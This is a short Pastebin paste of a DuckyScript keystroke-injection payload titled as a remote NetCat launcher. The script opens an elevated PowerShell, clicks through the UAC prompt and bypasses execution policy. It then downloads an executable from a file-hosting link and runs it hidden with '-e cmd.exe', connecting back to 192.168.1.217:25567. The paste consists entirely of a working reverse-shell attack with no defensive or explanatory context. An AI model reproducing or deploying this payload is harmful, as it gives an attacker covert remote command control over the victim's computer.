Advertisement
HaydenM

DuckyScript Remote NetCat launch

Dec 13th, 2016
2,126
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.46 KB | None | 0 0
  1. DELAY 1000
  2. GUI r
  3. DELAY 200
  4. STRING powershell Start-Process powershell -Verb runAs
  5. ENTER
  6. DELAY 1000
  7. ALT y
  8. DELAY 500
  9. STRING cd \; mkdir \win; cd \win; echo (powershell Invoke-WebRequest -Outfile a.exe 'https://1fichier.com/?1emsgmlt6d') > b.ps1; powershell -ExecutionPolicy ByPass -File b.ps1
  10. ENTER
  11. DELAY 1250
  12. STRING cmd.exe
  13. DELAY 50
  14. ENTER
  15. DELAY 200
  16. STRING START /MIN a.exe 192.168.1.217 25567 -e cmd.exe -d & exit
  17. DELAY 50
  18. ENTER
  19. DELAY 100
  20. STRING Exit
  21. ENTER
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement